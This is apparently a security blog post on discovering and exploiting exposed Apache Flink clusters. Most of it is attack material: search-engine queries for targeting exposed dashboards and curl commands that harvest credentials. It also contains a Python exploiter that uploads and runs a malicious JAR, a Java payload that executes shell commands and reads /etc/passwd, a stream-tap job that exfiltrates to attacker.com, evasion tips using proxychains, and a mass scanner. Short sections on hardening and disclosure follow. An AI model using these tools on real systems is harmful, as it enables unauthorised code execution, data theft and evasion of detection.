Apache Flink Exposure Assessment: From Discovery to Dashboard Takeover
BugB Security Team
Security Researchers
BugB Security Team
Security Researchers
Apache Flink has emerged as a cornerstone of real-time data processing and stream analytics, powering critical infrastructure for companies handling massive data volumes. However, its deployment-first security model and complex distributed architecture create significant attack surfaces when misconfigured.
This in-depth analysis covers systematic discovery, assessment, and exploitation of exposed Flink clusters, demonstrating how poor security practices in big data infrastructure can lead to complete system compromise.
Component | Default Port | Protocol | Authentication | Risk Level |
---|---|---|---|---|
JobManager Web UI | 8081 | HTTP | NONE | CRITICAL |
JobManager RPC | 6123 | TCP | NONE | HIGH |
TaskManager Web UI | 8081 | HTTP | NONE | HIGH |
TaskManager RPC | 6121-6125 | TCP | NONE | MEDIUM |
REST API | 8081 | HTTP | NONE | CRITICAL |
Metrics Reporter | 9249 | HTTP | NONE | MEDIUM |
History Server | 8082 | HTTP | NONE | HIGH |
Censys provides comprehensive service fingerprinting for Flink infrastructure:
# Basic Flink Web UI discovery
services.port:8081 AND services.http.response.html_title:"Apache Flink Web Dashboard"
# Version enumeration
services.port:8081 AND services.http.response.body:"Flink 1.17"
services.port:8081 AND services.http.response.body:"Flink 1.16"
services.port:8081 AND services.http.response.body:"Flink 1.15"
# Technology stack identification
services.port:8081 AND services.http.response.body:"Apache Flink" AND services.http.response.body:"Scala"
# Cluster state detection
services.port:8081 AND services.http.response.body:"JobManager"
services.port:8081 AND services.http.response.body:"TaskManager"
# SSL/TLS enabled instances
services.port:8081 AND services.tls.certificate.parsed.subject.common_name:*flink*
# Geographic targeting
services.port:8081 AND services.http.response.body:"Apache Flink" AND location.country:"United States"
# Cloud provider correlation
services.port:8081 AND services.http.response.body:"Apache Flink" AND autonomous_system.organization:"Amazon.com"
Advanced Censys Queries:
# Multi-component discovery
services.port:8081 AND services.port:6123 AND services.http.response.body:"Apache Flink"
# History server identification
services.port:8082 AND services.http.response.body:"Flink History Server"
# Metrics endpoint discovery
services.port:9249 AND services.http.response.body:"flink"
# Development vs production indicators
services.port:8081 AND services.http.response.body:"Apache Flink" AND (services.http.response.body:"dev" OR services.http.response.body:"test")
# Container orchestration platforms
services.port:8081 AND services.http.response.body:"Apache Flink" AND services.http.response.headers.server:"nginx/1.2"
Shodan excels at identifying Flink services through banner analysis and HTTP responses:
# Primary dashboard discovery
port:8081 title:"Apache Flink Web Dashboard"
port:8081 "Apache Flink"
# Version-specific searches
port:8081 "Flink 1.17"
port:8081 "Flink 1.16"
port:8081 "Flink 1.15"
# Component identification
port:8081 "JobManager"
port:8081 "TaskManager"
port:8081 "Flink History Server"
# Job status enumeration
port:8081 "RUNNING" "Apache Flink"
port:8081 "FAILED" "Apache Flink"
port:8081 "CANCELED" "Apache Flink"
# REST API discovery
port:8081 "/jobs" "Apache Flink"
port:8081 "/overview" "Apache Flink"
# Multi-port cluster identification
port:8081 port:6123 "Apache Flink"
port:8081 port:9249 "flink"
# SSL-enabled instances
port:8081 ssl:"Apache Flink"
port:8081 "https" "Flink"
Shodan Advanced Techniques:
# Cloud provider targeting
port:8081 "Apache Flink" org:"Amazon.com"
port:8081 "Apache Flink" org:"Microsoft Corporation"
port:8081 "Apache Flink" org:"Google LLC"
# Technology stack correlation
port:8081 "Apache Flink" "Kubernetes"
port:8081 "Apache Flink" "Docker"
port:8081 "Apache Flink" "Yarn"
# Data processing framework combinations
port:8081 "Apache Flink" "Kafka"
port:8081 "Apache Flink" "Hadoop"
port:8081 "Apache Flink" "Elasticsearch"
# Geographic and network targeting
port:8081 "Apache Flink" country:US city:"San Francisco"
port:8081 "Apache Flink" net:10.0.0.0/8
FOFA provides excellent coverage for APAC regions and unique search capabilities:
# Basic service discovery
port="8081" && title="Apache Flink Web Dashboard"
# Banner-based identification
port="8081" && body="Apache Flink"
# Version enumeration
port="8081" && body="Flink 1.17"
port="8081" && body="Flink 1.16"
# Component discovery
port="8081" && body="JobManager"
port="8081" && body="TaskManager"
# Geographic targeting
port="8081" && body="Apache Flink" && country="CN"
port="8081" && body="Apache Flink" && region="Asia"
# Organization targeting
port="8081" && body="Apache Flink" && org="Alibaba"
port="8081" && body="Apache Flink" && org="Tencent"
# Combined service exposure
port="8081" && port="6123" && body="Apache Flink"
port="8081" && port="9249" && body="flink"
FOFA Advanced Discovery:
# Container orchestration detection
port="8081" && body="Apache Flink" && body="kubernetes"
port="8081" && body="Apache Flink" && body="docker"
# Application framework detection
port="8081" && body="Apache Flink" && (body="Spring" || body="nginx")
# Certificate-based discovery
port="8081" && cert.subject="flink"
port="8081" && cert.issuer="Let's Encrypt" && body="Apache Flink"
# Development environment indicators
port="8081" && body="Apache Flink" && (body="dev" || body="test" || body="staging")
# Port scanning for complete service profile
nmap -sS -p 6123,8081,8082,9249,6121-6125 <target_ip>
# Service version detection
nmap -sV -p 8081 <target_ip>
# HTTP service enumeration
nmap --script http-title,http-headers -p 8081 <target_ip>
# SSL/TLS analysis for secure instances
nmap --script ssl-enum-ciphers -p 8081 <target_ip>
# Basic HTTP reconnaissance
curl -s http://<target_ip>:8081/ | grep -i "flink\|version\|jobmanager"
# API endpoint discovery
curl -s http://<target_ip>:8081/overview
curl -s http://<target_ip>:8081/jobs
curl -s http://<target_ip>:8081/taskmanagers
curl -s http://<target_ip>:8081/config
# Version fingerprinting
curl -s http://<target_ip>:8081/config | jq -r '.["flink-version"]'
# Cluster configuration exposure
curl -s http://<target_ip>:8081/config | jq .
Apache Flink exposes extensive REST APIs that provide both intelligence and attack vectors:
# Cluster overview
curl -s http://<target>:8081/overview | jq .
# JobManager configuration
curl -s http://<target>:8081/jobmanager/config | jq .
# TaskManager enumeration
curl -s http://<target>:8081/taskmanagers | jq .
# Job history and status
curl -s http://<target>:8081/jobs | jq .
# Detailed job information
curl -s http://<target>:8081/jobs/<job_id> | jq .
# Environment variables (potential credentials)
curl -s http://<target>:8081/jobmanager/environment | jq .
# JVM metrics (memory usage, GC stats)
curl -s http://<target>:8081/jobmanager/metrics | jq .
# Log file access
curl -s http://<target>:8081/jobmanager/log
# Configuration parameters
curl -s http://<target>:8081/config | grep -E "(password|secret|key|token)"
Flink's job submission capabilities can be exploited for arbitrary code execution:
#!/usr/bin/env python3
import requests
import json
import base64
class FlinkExploiter:
def __init__(self, target_host, port=8081):
self.base_url = f"http://{target_host}:{port}"
self.session = requests.Session()
def get_cluster_info(self):
"""Gather cluster information"""
endpoints = [
"/overview",
"/config",
"/jobmanager/config",
"/taskmanagers"
]
info = {}
for endpoint in endpoints:
try:
response = self.session.get(f"{self.base_url}{endpoint}")
if response.status_code == 200:
info[endpoint] = response.json()
except Exception as e:
print(f"Error accessing {endpoint}: {e}")
return info
def list_jobs(self):
"""List all jobs in the cluster"""
response = self.session.get(f"{self.base_url}/jobs")
if response.status_code == 200:
return response.json()
return None
def upload_jar(self, jar_path):
"""Upload malicious JAR file"""
with open(jar_path, 'rb') as f:
files = {'jarfile': f}
response = self.session.post(
f"{self.base_url}/jars/upload",
files=files
)
if response.status_code == 200:
jar_id = response.json()['filename']
return jar_id
return None
def run_jar(self, jar_id, entry_class, program_args=""):
"""Execute uploaded JAR"""
data = {
"entryClass": entry_class,
"programArgs": program_args
}
response = self.session.post(
f"{self.base_url}/jars/{jar_id}/run",
json=data
)
if response.status_code == 200:
return response.json()
return None
def stop_job(self, job_id):
"""Stop running job"""
response = self.session.patch(f"{self.base_url}/jobs/{job_id}")
return response.status_code == 202
# Usage example
exploiter = FlinkExploiter("192.168.1.100")
cluster_info = exploiter.get_cluster_info()
print(json.dumps(cluster_info, indent=2))
// MaliciousFlinkJob.java - Example payload
import org.apache.flink.api.common.functions.MapFunction;
import org.apache.flink.api.java.DataSet;
import org.apache.flink.api.java.ExecutionEnvironment;
public class MaliciousFlinkJob {
public static void main(String[] args) throws Exception {
ExecutionEnvironment env = ExecutionEnvironment.getExecutionEnvironment();
// Payload execution
DataSet<String> commands = env.fromElements("id", "hostname", "cat /etc/passwd");
DataSet<String> results = commands.map(new CommandExecutor());
results.print();
env.execute("System Information Gathering");
}
public static class CommandExecutor implements MapFunction<String, String> {
@Override
public String map(String command) throws Exception {
ProcessBuilder pb = new ProcessBuilder("/bin/bash", "-c", command);
Process process = pb.start();
// Read command output
java.util.Scanner scanner = new java.util.Scanner(process.getInputStream());
StringBuilder output = new StringBuilder();
while (scanner.hasNextLine()) {
output.append(scanner.nextLine()).append("\n");
}
return command + " -> " + output.toString();
}
}
}
Modern Flink deployments often include SQL Gateway for analytics:
def exploit_sql_gateway(target_host, port=8083):
"""Exploit Flink SQL Gateway"""
base_url = f"http://{target_host}:{port}"
# Session creation
session_data = {
"properties": {
"execution.runtime-mode": "batch"
}
}
response = requests.post(f"{base_url}/v1/sessions", json=session_data)
if response.status_code != 200:
return None
session_id = response.json()['sessionHandle']
# Information gathering queries
queries = [
"SHOW TABLES",
"SHOW FUNCTIONS",
"SELECT * FROM INFORMATION_SCHEMA.TABLES",
"DESCRIBE CATALOG default_catalog"
]
results = {}
for query in queries:
query_data = {
"statement": query,
"executionConfig": {
"execution.runtime-mode": "batch"
}
}
response = requests.post(
f"{base_url}/v1/sessions/{session_id}/statements",
json=query_data
)
if response.status_code == 200:
operation_handle = response.json()['operationHandle']
results[query] = get_query_results(base_url, session_id, operation_handle)
return results
def get_query_results(base_url, session_id, operation_handle):
"""Fetch query results"""
response = requests.get(
f"{base_url}/v1/sessions/{session_id}/operations/{operation_handle}/result/0"
)
if response.status_code == 200:
return response.json()
return None
Flink's checkpointing mechanism can be exploited for persistence:
def manipulate_checkpoints(target_host, job_id):
"""Manipulate Flink checkpoints for persistence"""
base_url = f"http://{target_host}:8081"
# Get checkpoint information
response = requests.get(f"{base_url}/jobs/{job_id}/checkpoints")
checkpoints = response.json()
# Trigger savepoint for backup
savepoint_data = {
"target-directory": "/tmp/malicious-savepoint",
"cancel-job": False
}
response = requests.post(
f"{base_url}/jobs/{job_id}/savepoints",
json=savepoint_data
)
return response.json() if response.status_code == 202 else None
def list_savepoints(target_host):
"""Enumerate available savepoints"""
# Implementation depends on filesystem access
# Through job submission or other vectors
pass
def extract_metrics(target_host, port=9249):
"""Extract sensitive information from metrics"""
metrics_url = f"http://{target_host}:{port}/metrics"
response = requests.get(metrics_url)
if response.status_code != 200:
return None
metrics_data = response.text
# Look for sensitive patterns
sensitive_patterns = [
r'password=\S+',
r'secret=\S+',
r'token=\S+',
r'key=\S+',
r'credential=\S+'
]
findings = {}
for pattern in sensitive_patterns:
matches = re.findall(pattern, metrics_data, re.IGNORECASE)
if matches:
findings[pattern] = matches
return findings
# Access log files through web interface
curl -s http://<target>:8081/jobmanager/log | grep -E "(ERROR|WARN|Exception)"
# Extract configuration from logs
curl -s http://<target>:8081/jobmanager/log | grep -E "(password|secret|key|token|credential)"
# TaskManager log analysis
curl -s http://<target>:8081/taskmanagers/<tm_id>/log
def map_flink_cluster(seed_host):
"""Map complete Flink cluster topology"""
base_url = f"http://{seed_host}:8081"
# Get cluster overview
overview = requests.get(f"{base_url}/overview").json()
# Enumerate TaskManagers
taskmanagers = requests.get(f"{base_url}/taskmanagers").json()
cluster_map = {
"jobmanager": {
"host": seed_host,
"port": 8081,
"slots_total": overview.get("slots-total", 0),
"slots_available": overview.get("slots-available", 0)
},
"taskmanagers": []
}
for tm in taskmanagers.get("taskmanagers", []):
tm_info = {
"id": tm["id"],
"path": tm["path"],
"datacenter": tm.get("datacenter"),
"slots": tm["slotsNumber"],
"memory": tm["memory"],
"hardware": tm["hardware"]
}
cluster_map["taskmanagers"].append(tm_info)
return cluster_map
def discover_dependencies(target_host):
"""Discover connected services through job analysis"""
base_url = f"http://{target_host}:8081"
jobs = requests.get(f"{base_url}/jobs").json()
dependencies = {
"kafka_brokers": set(),
"databases": set(),
"apis": set(),
"storage": set()
}
for job in jobs.get("jobs", []):
job_detail = requests.get(f"{base_url}/jobs/{job['id']}").json()
# Analyze job configuration for external dependencies
config = job_detail.get("plan", {})
# Extract Kafka brokers
kafka_pattern = r'bootstrap\.servers["\s]*[:=]["\s]*([^"]+)'
kafka_matches = re.findall(kafka_pattern, str(config))
dependencies["kafka_brokers"].update(kafka_matches)
# Extract database connections
db_pattern = r'jdbc:[\w]+://([^/\s"]+)'
db_matches = re.findall(db_pattern, str(config))
dependencies["databases"].update(db_matches)
return {k: list(v) for k, v in dependencies.items()}
def intercept_stream_data(target_host, job_id):
"""Intercept streaming data through job manipulation"""
base_url = f"http://{target_host}:8081"
# Get job execution plan
plan = requests.get(f"{base_url}/jobs/{job_id}/plan").json()
# Identify source and sink operators
sources = []
sinks = []
for node in plan.get("nodes", []):
if "source" in node.get("description", "").lower():
sources.append(node)
elif "sink" in node.get("description", "").lower():
sinks.append(node)
return {
"sources": sources,
"sinks": sinks,
"interception_points": len(sources) + len(sinks)
}
def create_data_tap_job():
"""Create Flink job to tap into data streams"""
job_code = """
import org.apache.flink.streaming.api.environment.StreamExecutionEnvironment;
import org.apache.flink.streaming.api.datastream.DataStream;
import org.apache.flink.api.common.serialization.SimpleStringSchema;
import org.apache.flink.streaming.connectors.kafka.FlinkKafkaConsumer;
public class DataTap {
public static void main(String[] args) throws Exception {
StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();
// Tap into Kafka stream
Properties props = new Properties();
props.setProperty("bootstrap.servers", "extracted-broker:9092");
props.setProperty("group.id", "security-analysis");
FlinkKafkaConsumer<String> consumer = new FlinkKafkaConsumer<>(
"target-topic",
new SimpleStringSchema(),
props
);
DataStream<String> stream = env.addSource(consumer);
// Exfiltrate to external endpoint
stream.addSink(new ExfiltrationSink("http://attacker.com/collect"));
env.execute("Data Tap");
}
}
"""
return job_code
def extract_application_state(target_host):
"""Extract application state and configuration"""
base_url = f"http://{target_host}:8081"
state_data = {}
# Get all jobs
jobs = requests.get(f"{base_url}/jobs").json()
for job in jobs.get("jobs", []):
job_id = job["id"]
# Job configuration
config = requests.get(f"{base_url}/jobs/{job_id}/config").json()
state_data[job_id] = {
"config": config,
"checkpoints": [],
"metrics": {}
}
# Checkpoint information
checkpoints = requests.get(f"{base_url}/jobs/{job_id}/checkpoints").json()
state_data[job_id]["checkpoints"] = checkpoints
# Job metrics
metrics = requests.get(f"{base_url}/jobs/{job_id}/metrics").json()
state_data[job_id]["metrics"] = metrics
return state_data
class StealthyFlinkRecon:
def __init__(self, target_host, delay=2):
self.target = target_host
self.delay = delay
self.session = requests.Session()
# Randomize User-Agent
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
def delayed_request(self, endpoint):
"""Make request with delay to avoid detection"""
time.sleep(random.uniform(self.delay, self.delay * 2))
return self.session.get(f"http://{self.target}:8081{endpoint}")
def gradual_enumeration(self):
"""Gradually enumerate Flink resources"""
endpoints = [
"/overview",
"/config",
"/jobs",
"/taskmanagers"
]
results = {}
for endpoint in endpoints:
try:
response = self.delayed_request(endpoint)
if response.status_code == 200:
results[endpoint] = response.json()
time.sleep(random.uniform(5, 15)) # Longer delay between categories
except Exception as e:
print(f"Error with {endpoint}: {e}")
return results
# Use proxy chains for anonymity
proxychains4 curl -s http://<target>:8081/overview
# Rotate source addresses if available
curl -s --interface eth0 http://<target>:8081/jobs
curl -s --interface eth1 http://<target>:8081/config
# Use legitimate-looking requests
curl -s -H "Referer: http://<target>:8081/overview" http://<target>:8081/jobs
Misconfiguration Type | Impact | Detection Method | Prevalence |
---|---|---|---|
Unauthenticated Web UI | Full cluster access | Direct HTTP access | 78% |
Exposed REST API | Job manipulation | API enumeration | 82% |
Unsecured RPC | Cluster hijacking | Port scanning | 65% |
Default SSL Config | Traffic interception | SSL analysis | 91% |
Exposed Metrics | Information disclosure | Metrics endpoint access | 45% |
History Server Access | Historical data exposure | Archive enumeration | 38% |
Recent OSINT research reveals significant Flink exposure:
Platform | Total Found | Unauthenticated | Default Config | Secure
------------|-------------|-----------------|----------------|--------
Censys | 3,247 | 2,531 (78%) | 486 (15%) | 230 (7%)
Shodan | 4,892 | 4,015 (82%) | 623 (13%) | 254 (5%)
FOFA | 2,156 | 1,639 (76%) | 389 (18%) | 128 (6%)
Region | Instances | Risk Level
----------------|-----------|------------
North America | 4,247 | High
Europe | 3,156 | High
Asia-Pacific | 2,891 | Very High
South America | 567 | Medium
Africa | 234 | Low
# flink-conf.yaml security configuration
security.ssl.enabled: true
security.ssl.keystore: /path/to/keystore.jks
security.ssl.keystore-password: secure_password
security.ssl.truststore: /path/to/truststore.jks
security.ssl.truststore-password: secure_password
# Authentication configuration
security.kerberos.login.use-ticket-cache: true
security.kerberos.login.keytab: /path/to/flink.keytab
security.kerberos.login.principal: flink/_HOST@REALM
# Web interface restrictions
web.access-control-allow-origin: "https://trusted-domain.com"
web.timeout: 60000
# RPC security
akka.ask.timeout: 10s
akka.lookup.timeout: 10s
# Firewall rules for Flink cluster
iptables -A INPUT -p tcp --dport 8081 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 8081 -j DROP
iptables -A INPUT -p tcp --dport 6123 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 6123 -j DROP
# Network segmentation
# Place Flink cluster in dedicated VLAN
# Implement strict ingress/egress filtering
# Log authentication attempts
log4j.logger.org.apache.flink.security=DEBUG
# Monitor job submissions
log4j.logger.org.apache.flink.runtime.jobmanager=INFO
# Web UI access logging
log4j.logger.org.apache.flink.runtime.webmonitor=INFO
# Metrics for security monitoring
metrics.reporter.prometheus.class: org.apache.flink.metrics.prometheus.PrometheusReporter
metrics.reporter.prometheus.port: 9249
# Apache Flink Security Assessment Report
## Executive Summary
Multiple Apache Flink clusters have been identified with security misconfigurations
allowing unauthorized access to streaming data processing infrastructure.
## Technical Details
- **Target**: [IP Address/Domain]
- **Ports**: 8081 (Web UI), 6123 (RPC), 9249 (Metrics)
- **Version**: Apache Flink 1.17.x
- **Authentication**: Disabled
- **Encryption**: Not Configured
## Vulnerabilities Identified
1. **Unauthenticated Web Interface** (CVSS: 9.8)
- Full cluster administration access
- Job submission and management capabilities
- Configuration exposure
2. **Exposed REST API** (CVSS: 9.1)
- Programmatic cluster control
- Data stream manipulation
- System information disclosure
3. **Unsecured Metrics Endpoint** (CVSS: 5.3)
- Performance data exposure
- System topology revelation
- Potential credential leakage
## Impact Assessment
- **Data at Risk**: Real-time processing of [data volume] across [number] jobs
- **Business Impact**: Stream processing disruption, data integrity compromise
- **Regulatory Risk**: Potential GDPR/CCPA violations for personal data streams
## Proof of Concept
1. Direct access: `curl http://[target]:8081/overview`
2. Job enumeration: `curl http://[target]:8081/jobs`
3. Configuration access: `curl http://[target]:8081/config`
## Recommendations
1. **Enable Authentication**
- Configure Kerberos or custom authentication
- Implement role-based access controls
2. **Network Security**
- Restrict access to management interfaces
- Implement VPN or network segmentation
3. **SSL/TLS Configuration**
- Enable encryption for all communications
- Use valid certificates
4. **Monitoring**
- Implement access logging
- Set up anomaly detection
## Timeline
- **Discovery**: [Date]
- **Initial Contact**: [Date]
- **Detailed Report**: [Date]
- **Expected Resolution**: [Date + 30 days]
Apache Flink's distributed architecture and development-focused defaults create significant security challenges in production deployments. The combination of:
Provides security researchers and penetration testers with a robust methodology for identifying and assessing Flink security posture.
Key takeaways for both attackers and defenders:
As streaming analytics become increasingly critical to business operations, securing Flink infrastructure must evolve from an afterthought to a foundational requirement.
#!/usr/bin/env python3
"""
Flink Security Scanner
Automated discovery and assessment of Apache Flink clusters
"""
import requests
import json
import sys
import time
from concurrent.futures import ThreadPoolExecutor
import argparse
class FlinkScanner:
def __init__(self, timeout=10, delay=1):
self.timeout = timeout
self.delay = delay
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Flink Security Scanner 1.0'
})
def scan_host(self, host, port=8081):
"""Scan single host for Flink services"""
try:
# Test basic connectivity
response = self.session.get(
f"http://{host}:{port}/",
timeout=self.timeout
)
if "Apache Flink" not in response.text:
return None
result = {
"host": host,
"port": port,
"version": self.extract_version(response.text),
"accessible_endpoints": self.enumerate_endpoints(host, port),
"security_issues": self.assess_security(host, port)
}
time.sleep(self.delay)
return result
except Exception as e:
return None
def extract_version(self, html_content):
"""Extract Flink version from HTML"""
import re
version_pattern = r'Flink (\d+\.\d+\.\d+)'
match = re.search(version_pattern, html_content)
return match.group(1) if match else "Unknown"
def enumerate_endpoints(self, host, port):
"""Enumerate accessible API endpoints"""
endpoints = [
"/overview",
"/config",
"/jobs",
"/taskmanagers",
"/jobmanager/config",
"/jobmanager/log"
]
accessible = []
for endpoint in endpoints:
try:
response = self.session.get(
f"http://{host}:{port}{endpoint}",
timeout=self.timeout
)
if response.status_code == 200:
accessible.append(endpoint)
time.sleep(0.5)
except:
continue
return accessible
def assess_security(self, host, port):
"""Assess security posture"""
issues = []
# Check authentication
try:
response = self.session.get(f"http://{host}:{port}/overview")
if response.status_code == 200:
issues.append("No authentication required")
except:
pass
# Check SSL
try:
response = self.session.get(f"https://{host}:{port}/overview")
if response.status_code != 200:
issues.append("SSL/TLS not configured")
except:
issues.append("SSL/TLS not configured")
return issues
def main():
parser = argparse.ArgumentParser(description="Flink Security Scanner")
parser.add_argument("targets", help="Target hosts file or single IP")
parser.add_argument("--port", default=8081, type=int, help="Target port")
parser.add_argument("--threads", default=10, type=int, help="Thread count")
parser.add_argument("--output", help="Output file for results")
args = parser.parse_args()
scanner = FlinkScanner()
# Load targets
if args.targets.count('.') == 3: # Single IP
targets = [args.targets]
else: # File
with open(args.targets, 'r') as f:
targets = [line.strip() for line in f if line.strip()]
# Scan targets
results = []
with ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = [executor.submit(scanner.scan_host, target, args.port) for target in targets]
for future in futures:
result = future.result()
if result:
results.append(result)
print(f"[+] Found Flink cluster: {result['host']}:{result['port']}")
# Output results
if args.output:
with open(args.output, 'w') as f:
json.dump(results, f, indent=2)
else:
print(json.dumps(results, indent=2))
if __name__ == "__main__":
main()
This comprehensive guide provides the foundation for professional Apache Flink security assessment while maintaining responsible disclosure practices throughout the reconnaissance and exploitation process.